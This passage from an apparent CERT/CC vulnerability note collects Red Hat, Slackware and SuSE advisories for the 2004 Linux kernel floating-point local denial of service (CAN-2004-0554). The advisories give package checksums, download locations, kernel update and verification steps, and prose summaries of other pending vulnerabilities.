kernel-doc-2.4.21-15.0.2.EL.s390.rpm \n860944b6a4e8384a0b344dc96ea48b6d kernel-doc-2.4.21-15.0.2.EL.s390x.rpm \n608d072210521af17c455f7754a6e352 kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm \n6c8dad84abc4dd1892c9dc862c329273 kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm \n426c517d35a53546138b0d72a0515909 kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm \n96eb477ac938da01b729b5ac5ed36e3b kernel-smp-2.4.21-15.0.2.EL.athlon.rpm \nbece09ba4a651196758380372dc4c593 kernel-smp-2.4.21-15.0.2.EL.i686.rpm \n82154d7551d6e4947af70b3044c9d4d2 kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm \n9d24273cc70bb6be810984cb3f3d0a36 kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n775338e099c3bdf36a586d29e55dbd3e kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm \n8fde60be45154b7722893feb65506f42 kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n3c690c54909996d3bba3da7c8d8f894a kernel-source-2.4.21-15.0.2.EL.i386.rpm \na8fc2a1042ee3e580881b50c97a3241d kernel-source-2.4.21-15.0.2.EL.ia64.rpm \n937a05a7666f14f95d20be19fc461f05 kernel-source-2.4.21-15.0.2.EL.ppc64.rpm \n282bb4f0e5bfbec228a742ab6666665d kernel-source-2.4.21-15.0.2.EL.s390.rpm \n6e9628389fa69aafc9c910e4b37a425a kernel-source-2.4.21-15.0.2.EL.s390x.rpm \n44be30f820be806621b47786ebff1844 kernel-source-2.4.21-15.0.2.EL.x86_64.rpm \n17f10f04cffc9751afb1499aaff00fdc kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n89ee51cb60f7a1f34e66cbb16abcba07 kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm \n144943d76b23470572326c84b57c0dd9 kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm \n60e5c1f1efa438a658b12e16543214cd kernel-unsupported-2.4.21-15.0.2.EL.ia64.rpm \n57f0111e6443fd5a39099731cc0856e8 kernel-unsupported-2.4.21-15.0.2.EL.ppc64iseries.rpm \n22f38c0c1abee45e0ac24caa19e06311 kernel-unsupported-2.4.21-15.0.2.EL.ppc64pseries.rpm \n8f67e244ba867a103e6b211d3d0d1fba kernel-unsupported-2.4.21-15.0.2.EL.s390.rpm \n3522c33c18eb876b5033ef12398707fe kernel-unsupported-2.4.21-15.0.2.EL.s390x.rpm \naa060423c3136a26ca31a7aafa337380 kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n \n \nThese packages are GPG signed by Red Hat for security. Our key is \navailable from <https://www.redhat.com/security/team/key.html> \n \nYou can verify each package with the following command: \n \nrpm --checksig -v <filename> \n \nIf you only wish to verify that each package has not been corrupted or \ntampered with, examine only the md5sum with the following command: \n \nmd5sum <filename> \n \n \n8\\. References: \n \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0427> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0495> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0554> \n \n9\\. Contact: \n \nThe Red Hat security contact is <secalert@redhat.com>. More contact \ndetails at <https://www.redhat.com/security/team/contact.html> \n \nCopyright 2004 Red Hat, Inc. \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFA0pQzXlSAg2UNWIIRAnebAJ92x5UDw32uwjVFVe9Eat4cQQqXAwCgkRtl \nOG3QYv33e4XJlyE9npuygvs= \n=Joca \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ Slackware\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[slackware-security] kernel DoS (SSA:2004-167-01) \n \nNew kernel packages are available for Slackware 8.1, 9.0, 9.1, \nand -current to fix a denial of service security issue. Without \na patch to asm-i386/i387.h, a local user can crash the machine. \n \nMore details about this issue may be found in the Common \nVulnerabilities and Exposures (CVE) database: \n \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0554> \n \nHere are the details from the Slackware 9.1 ChangeLog: \n+--------------------------+ \nTue Jun 15 02:11:41 PDT 2004 \npatches/packages/kernel-ide-2.4.26-i486-3.tgz: Patched local DoS \n(CAN-2004-0554). Without this patch to asm-i386/i387.h a local user \ncan crash the kernel. \n(* Security fix *) \npatches/packages/kernel-source-2.4.26-noarch-2.tgz: Patched local DoS \n(CAN-2004-0554). The new patch can be found here, too: \npatches/source/kernel-source/CAN-2004-0554.i387.fnclex.diff.gz \n(* Security fix *) \npatches/kernels/*: Patched local DoS (CAN-2004-0554). \n(* Security fix *) \n+--------------------------+ \n \n \nWhere to find the new packages: \n+-----------------------------+ \n \nUpdated packages for Slackware 8.1: \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/kernel-ide-2.4.18-i386-6.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/kernel-source-2.4.18-noarch-7.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/kernels/> \n \nUpdated packages for Slackware 9.0: \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/kernel-ide-2.4.21-i486-4.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/kernel-source-2.4.21-noarch-4.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/kernels/> \n \nUpdated packages for Slackware 9.1: \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-ide-2.4.26-i486-3.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-source-2.4.26-noarch-2.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/kernels/> \n \nUpdated packages for Slackware -current: \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-ide-2.4.26-i486-4.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/kernel-headers-2.4.26-i386-3.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-2.4.26-noarch-4.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/kernels/> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/testing/packages/linux-2.6.6/kernel-generic-2.6.6-i486-5.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/testing/packages/linux-2.6.6/kernel-headers-2.6.6-i386-3.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/testing/packages/linux-2.6.6/kernel-source-2.6.6-noarch-3.tgz> \n \nJust the patch for 2.4.x kernels: \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/source/kernel-source/CAN-2004-0554.i387.fnclex.diff.gz> \n77d9eb0640f07df4167aaa53e0b42e2e CAN-2004-0554.i387.fnclex.diff.gz \n \nJust the patch for 2.6.x kernels: \n<ftp://ftp.slackware.com/pub/slackware/slackware-current/testing/source/linux-2.6.x/CAN-2004-0554.i387.fnclex.diff.gz> \ne453d64187eac2216bebf85d72449fcb CAN-2004-0554.i387.fnclex.diff.gz \n \n \nMD5 signatures: \n+-------------+ \n \nSlackware 8.1 packages: \n8bbced2d1f09d033de89ae5957427a25 kernel-ide-2.4.18-i386-6.tgz \n050aa2dd8d38f0ba3de2fca621eb13c9 kernel-source-2.4.18-noarch-7.tgz \n \nSlackware 9.0 packages: \n21dbafdcf32d84c22daddc349a719420 kernel-ide-2.4.21-i486-4.tgz \n56ca0fbf5778283a1d9a76a278cb7cf5 kernel-source-2.4.21-noarch-4.tgz \n \nSlackware 9.1 packages: \n614b79763721126939569f235d4524d6 kernel-ide-2.4.26-i486-3.tgz \n43681f735928641a2b5fc786604bca77 kernel-source-2.4.26-noarch-2.tgz \n \nSlackware -current packages: \n7a19720356937bcc0f360b8b158a1419 kernel-ide-2.4.26-i486-4.tgz \nc0d2d8b2977d5c86d100fe02a8c2681b kernel-headers-2.4.26-i386-3.tgz \n8fbb66feb2d108baa6af6a895fc7f49a kernel-source-2.4.26-noarch-4.tgz \n91ccc5ff7a5be15afdee86a60c6b408d kernel-generic-2.6.6-i486-5.tgz \nbdcb17009e79bb375dad7fecdd7e60ae kernel-headers-2.6.6-i386-3.tgz \ned7c1e42f537414db8cd4dda8e2e9077 kernel-source-2.6.6-noarch-3.tgz \n \n \nInstallation instructions: \n+------------------------+ \n \nUse upgradepkg to install the new packages. \nAfter installing the kernel-ide package you will need to run lilo ('lilo' \nat a command prompt) or create a new system boot disk ('makebootdisk'), and \nreboot. \n \nIf desired, a kernel from the kernels/ directory may be used instead. For \nexample, to use the kernel in kernels/scsi.s/, you would copy it to the \nboot directory like this: \n \ncd kernels/scsi.s \ncp bzImage /boot/vmlinuz-scsi.s-2.4.26 \n \nCreate a symbolic link: \nln -sf /boot/vmlinuz-scsi.s-2.4.26 /boot/vmlinuz \n \nThen, run 'lilo' or create a new system boot disk and reboot. \n \n \n+-----+ \n \nSlackware Linux Security Team \n<http://slackware.com/gpg-key> \nsecurity@slackware.com \n \n+------------------------------------------------------------------------+ \n| To leave the slackware-security mailing list: | \n+------------------------------------------------------------------------+ \n| Send an email to majordomo@slackware.com with this text in the body of | \n| the email message: | \n| | \n| unsubscribe slackware-security | \n| | \n| You will get a confirmation message back containing instructions to | \n| complete the process. Please do not reply to this email address. | \n+------------------------------------------------------------------------+ \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.4 (GNU/Linux) \n \niD8DBQFAzzc6akRjwEAQIjMRAmNLAJ9cY5eDhdmZJBDc4IoJD+owJ2PlkACcCOWh \nDyVVz1pzzG06SBnUbpC/iHg= \n=luGU \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ SuSE Inc.\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nWe will release a new kernel package as soon as possible. Our customers can update their systems by using the YaST Online Update (YOU) tool or installing the RPM file directly from <http://www.suse.de/en/private/download/updates/index.html>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n \n______________________________________________________________________________ \n \nSUSE Security Announcement \n \nPackage: kernel \nAnnouncement-ID: SuSE-SA:2004:017 \nDate: Wednesday, Jun 16th 2004 15:20 MEST \nAffected products: 8.0, 8.1, 8.2, 9.0, 9.1 \nSuSE Linux Database Server, \nSuSE eMail Server III, 3.1 \nSuSE Linux Enterprise Server 7, 8 \nSuSE Linux Firewall on CD/Admin host \nSuSE Linux Connectivity Server \nSuSE Linux Office Server \nVulnerability Type: local denial-of-service attack \nSeverity (1-10): 4 \nSUSE default package: no \nCross References: CAN-2004-0554 \n \nContent of this advisory: \n1) security vulnerability resolved: \n- floating point exception causes system crash \nproblem description, discussion, solution and upgrade information \n2) pending vulnerabilities, solutions, workarounds: \n- icecast \n- sitecopy \n- cadaver \n- OpenOffice_org \n- tripwire \n- postgresql \n- lha \n- XDM \n- mod_proxy \n3) standard appendix (further information) \n \n______________________________________________________________________________ \n \n1) problem description, brief discussion, solution, upgrade information \n \nThe Linux kernel is vulnerable to a local denial-of-service attack. \nBy using a C program it is possible to trigger a floating point \nexception that puts the kernel into an unusable state. \nTo execute this attack a malicious user needs shell access to the \nvictim's machine. \nThe severity of this bug is considered low because local denial-of- \nservice attacks are hard to prevent in general. \nAdditionally the bug is limited to x86 and x86_64 architecture. \n \n \n \nSPECIAL INSTALL INSTRUCTIONS: \n============================== \nThe following paragraphs will guide you through the installation \nprocess in a step-by-step fashion. The character sequence \"****\" \nmarks the beginning of a new paragraph. In some cases, the steps \noutlined in a particular paragraph may or may not be applicable \nto your situation. \nTherefore, please make sure to read through all of the steps below \nbefore attempting any of these procedures. \nAll of the commands that need to be executed are required to be \nrun as the superuser (root). Each step relies on the steps before \nit to complete successfully. \nNote: The update packages for the SuSE Linux Enterprise Server 7 \n(SLES7) are being tested at the moment and will be published as soon \nas possible. \n \n \n**** Step 1: Determine the needed kernel type \n \nPlease use the following command to find the kernel type that is \ninstalled on your system: \n \nrpm -qf /boot/vmlinuz \n \nFollowing are the possible kernel types (disregard the version and \nbuild number following the name separated by the \"-\" character) \n \nk_deflt # default kernel, good for most systems. \nk_i386 # kernel for older processors and chipsets \nk_athlon # kernel made specifically for AMD Athlon(tm) family processors \nk_psmp # kernel for Pentium-I dual processor systems \nk_smp # kernel for SMP systems (Pentium-II and above) \nk_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM \nkernel-64k-pagesize \nkernel-bigsmp \nkernel-default \nkernel-smp \n \n**** Step 2: Download the package for your system \n \nPlease download the kernel RPM package for your distribution with the \nname as indicated by Step 1. The list of all kernel rpm packages is \nappended below. Note: The kernel-source package does not \ncontain a binary kernel in bootable form. Instead, it contains the \nsources that the binary kernel rpm packages are created from. It can be \nused by administrators who have decided to build their own kernel. \nSince the kernel-source.rpm is an installable (compiled) package that \ncontains sources for the linux kernel, it is not the source RPM for \nthe kernel RPM binary packages. \n \nThe kernel RPM binary packages for the distributions can be found at the \nlocations below <ftp://ftp.suse.com/pub/suse/i386/update/>. \n \n8.0/images/ \n8.1/rpm/i586 \n8.2/rpm/i586 \n9.0/rpm/i586 \n9.1/rpm/i586 \n \nAfter downloading the kernel RPM package for your system, you should \nverify the authenticity of the kernel rpm package using the methods as \nlisted in section 3) of each SUSE Security Announcement. \n \n \n**** Step 3: Installing your kernel rpm package \n \nInstall the rpm package that you have downloaded in Steps 3 or 4 with \nthe command \nrpm -Uhv --nodeps --force <K_FILE.RPM> \nwhere <K_FILE.RPM> is the name of the rpm package that you downloaded. \n \nWarning: After performing this step, your system will likely not be \nable to boot if the following steps have not been fully \nfollowed. \n \n \nIf you run SUSE LINUX 8.1 and haven't applied the kernel update \n(SUSE-SA:2003:034), AND you are using the freeswan package, you also \nneed to update the freeswan rpm as a dependency as offered \nby YOU (YaST Online Update). The package can be downloaded from \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/> \n \n**** Step 4: configuring and creating the initrd \n \nThe initrd is a ramdisk that is loaded into the memory of your \nsystem together with the kernel boot image by the bootloader. The \nkernel uses the content of this ramdisk to execute commands that must \nbe run before the kernel can mount its actual root filesystem. It is \nusually used to initialize SCSI drivers or NIC drivers for diskless \noperation. \n \nThe variable INITRD_MODULES in /etc/sysconfig/kernel determines \nwhich kernel modules will be loaded in the initrd before the kernel \nhas mounted its actual root filesystem. The variable should contain \nyour SCSI adapter (if any) or filesystem driver modules. \n \nWith the installation of the new kernel, the initrd has to be \nre-packed with the update kernel modules. Please run the command \n \nmk_initrd \n \nas root to create a new init ramdisk (initrd) for your system. \nOn SuSE Linux 8.1 and later, this is done automatically when the \nRPM is installed. \n \n \n**** Step 5: bootloader \n \nIf you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there \nare two options: \nDepending on your software configuration, you have either the lilo \nbootloader or the grub bootloader installed and initialized on your \nsystem. \nThe grub bootloader does not require any further actions to be \nperformed after the new kernel images have been moved in place by the \nrpm Update command. \nIf you have a lilo bootloader installed and initialized, then the lilo \nprogram must be run as root. Use the command \n \ngrep LOADER_TYPE /etc/sysconfig/bootloader \n \nto find out which boot loader is configured. If it is lilo, then you \nmust run the lilo command as root. If grub is listed, then your system \ndoes not require any bootloader initialization. \n \nWarning: An improperly installed bootloader may render your system \nunbootable. \n \n**** Step 6: reboot \n \nIf all of the steps above have been successfully completed on your \nsystem, then the new kernel including the kernel modules and the \ninitrd should be ready to boot. The system needs to be rebooted for \nthe changes to become active. Please make sure that all steps have \ncompleted, then reboot using the command \nshutdown -r now \nor \ninit 6 \n \nYour system should now shut down and reboot with the new kernel. \n \n \nThere is no workaround known. \n \n \nPlease download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the package using the command \"rpm -Fhv file.rpm\" to apply \nthe update. \nOur maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web. \n \n \nIntel i386 Platform: \n \nSuSE-9.1: \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.75.i586.rpm> \n8d11469e1815c5b2fa143fce62c17b95`\n\n` <ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.75.i586.rpm> \n75222182ad4c766b6482e5b83658819d \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.75.i586.rpm> \n45f1244f153ab1387a9dc67e7bcf20bb \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.75.i586.rpm> \n517647d955770503fe61ae2549c453dd \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm> \n9103503f430b9d854630ecb8855a2fb3 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm> \n9381c56f1f64835c5379dde278ac768d \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm> \n4f47dc2be58f5315cf596c051c2892b5 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.75.nosrc.rpm> \n732c1e7d2a9e41780464eccdc0d54505 \n \nSuSE-9.0: \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-226.i586.rpm> \n7b6022e2f80325b42fa7dc3188360530 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-226.i586.rpm> \n594efe04ccc233e890bfb277e8296c2d \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-226.i586.rpm> \nf41d088cf20bfe583e57f95a6b46d625 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-226.i586.rpm> \n39e2c09ece3f22b50eb777b85a7218ef \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-226.i586.rpm> \n83398954810403b9dfb65bcf1af25352 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-226.i586.rpm> \n18dde4a8af68dd1f78a0177c3214457a \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm> \nd5b037aaf122b1b05917e3f0b475baae \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-226.src.rpm> \ne10aea97785eb12716ad7d5e20cbd723 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm> \n54b8bbd368998abc1a63224caa880473 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm> \nf944b14978ecd211c26f8169238292bf \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-226.src.rpm> \n66a116aeb9757c538a0643e8322095a7 \n<ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-226.src.rpm> \n5e3694ba088fd39891a5979380679d20 \n \nSuSE-8.2: \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-113.i586.rpm> \na5843cb4e2b16515d70574d83113ac48 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-113.i586.rpm> \n724529485d3a304f0479f9216fc361af \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-113.i586.rpm> \nb0e687c208053d546b7057257beb7d32 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-113.i586.rpm> \n749b101e7fc4aa5c62e2a5b650002803 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-113.i586.rpm> \n3377544a5f6d9c73fdfe05140fce0813 \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-113.src.rpm> \n0a41c750b8cd3953d47e27ea15c58697 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-113.src.rpm> \na5e5790e5f7fe62905d29750543c9e20 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-113.src.rpm> \n9defa7cb706e924f8336dd03fafbcfd5 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-113.src.rpm> \n8469dbc8810dd292100d085e00bb6081 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-113.src.rpm> \nd990fcbace1f21ff383abdf7608a17ef \n \nSuSE-8.1: \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-226.i586.rpm> \n43ee5eae102f0258a414dd15e3fd9433 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-226.i586.rpm> \n0c6289e168307d615bfe6cef9ebcf879 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-226.i586.rpm> \n003a38c53fe91070eeae85983930c70e \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-226.i586.rpm> \n657d08fa4b5a2ba7de2a314a7d1622e1 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-226.i586.rpm> \ne19239b4ca52ebd21f775b5e6195f144 \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-226.src.rpm> \nee67f5db0ea2f1431f46b7dd27815a56 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-226.src.rpm> \nb29021156d6582e315666b16231b2a60 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-226.src.rpm> \nce5e47d527cee6968cd95bb8430d3e18 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-226.src.rpm> \na081a0f1e31f5491cdeba1fea5ea6411 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-226.src.rpm> \n1dbfd3b5f272fc75342ae55bbe7ab45c \n \nSuSE-8.0: \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-299.i386.rpm> \n7de319a4e6c667fba359686b814d4a73 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-299.i386.rpm> \ndf5aad7c423625a19af151bbba0f2ca8 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-299.i386.rpm> \ncb02c8381962eda997ebb115ef68ae4c \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-299.i386.rpm> \n903c6e61927803c2d592ac50fe9da6ce \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-299.i386.rpm> \ne2abf9ccdc8191e7d2ace58e8a1b5b5a \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-299.nosrc.rpm> \n622c85342dd84abd0400103902d05eed \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-299.src.rpm> \n37916ea39febc4dd43fabfccce9322db \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-299.src.rpm> \n0dde0e6758e42de5479e8776475ae76f \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-299.src.rpm> \n523bef4e31fa67f078d5fcbdc426a4c0 \n<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-299.src.rpm> \n06a2a062a54764a30adae0b8ea40cb29 \n \n \n \nOpteron x86_64 Platform: \n \nSuSE-9.1: \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.75.x86_64.rpm> \n1c878b1e29a9bea40547637b6a307b2d \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.75.x86_64.rpm> \n16de3ee2390bb2b92f9fe50451d4f082 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.75.x86_64.rpm> \nc310268daa83f18fcfd4cf19434f06e0 \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm> \n2fed0a8f3936027261add7d1cbfa5341 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm> \n9ad26d15566337c83273121390ea4e32 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm> \n352951be42b3093efb0148320a6f4c27 \n \nSuSE-9.0: \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-226.x86_64.rpm> \nced9c66ffa28bf7e7c795781f92083fe \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-226.x86_64.rpm> \n60539bc47e8cac0664ac5ca824d311e0 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-226.x86_64.rpm> \n083aeedd2a88ccc2e00c8f66cd61b81c \nsource rpm(s): \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm> \n58c40a206f6f615daa3486fc6d6ade38 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm> \n1c234f6c0475680b41c644c575ff8ef6 \n<ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm> \ne9b90824615859405b1979793662bc0d \n \n______________________________________________________________________________ \n \n2) Pending vulnerabilities in SUSE Distributions and Workarounds: \n \n- icecast \nThe icecast service is vulnerable to a remote denial-of-service \nattack. Update packages will be available soon. \n \n- sitecopy \nThe sitecopy package includes a vulnerable version of the \nneon library (CAN-2004-0179, CAN-2004-0398). Update packages will be \navailable soon. \n \n- cadaver \nThe cadaver package includes a vulnerable version of the \nneon library (CAN-2004-0179, CAN-2004-0398). Update packages will be \navailable soon. \n \n- OpenOffice_org \nThe OpenOffice_org package includes a vulnerable version \nof the neon library (CAN-2004-0179, CAN-2004-0398). Update packages \nwill be available soon. \n \n- tripwire \nA format string bug in tripwire can be exploited locally \nto gain root permissions. Update packages will be available soon. \n` \n` - postgresql \nA buffer overflow in psqlODBC could be exploited to crash the \napplication using it. E.g. a PHP script that uses ODBC to access a \nPostgreSQL database can be utilized to crash the surrounding Apache \nweb-server. Other parts of PostgreSQL are not affected. \nUpdate packages will be available soon. \n \n- lha \nMinor security fix for a buffer overflow while handling command \nline options. This buffer overflow could be exploited in conjunction \nwith other mechanisms to gain higher privileges or access the system \nremotely. \n \n- XDM/XFree86 \nThis update resolves random listening to ports by XDM \nthat allows to connect via the XDMCP. SUSE LINUX 9.1 \nis affected only. \nNew packages are currently being tested and will be \navailable soon. \n \n- mod_proxy \nA buffer overflow can be triggered by malicious remote \nservers that return a negative Content-Length value. \nThis vulnerability can be used to execute commands remotely \nNew packages are currently being tested and will be \navailable soon. \n \n______________________________________________________________________________ \n \n3) standard appendix: authenticity verification, additional information \n \n- Package authenticity verification: \n \nSUSE update packages are available on many mirror ftp servers around \nthe world. While this service is considered valuable and important \nto the free and open source software community, many users wish to be \ncertain as to be the origin of the package and its content before \ninstalling the package. There are two independent verification methods \nthat can be used to prove the authenticity of a downloaded file or \nrpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package. \n \n1) execute the command \nmd5sum <name-of-the-file.rpm> \nafter you have downloaded the file from a SUSE ftp server or its \nmirrors. Then, compare the resulting md5sum with the one that is \nlisted in the announcement. Since the announcement containing the \nchecksums is cryptographically signed (usually using the key \nsecurity@suse.de), the checksums offer proof of the authenticity \nof the package. \nWe recommend against subscribing to security lists which cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the 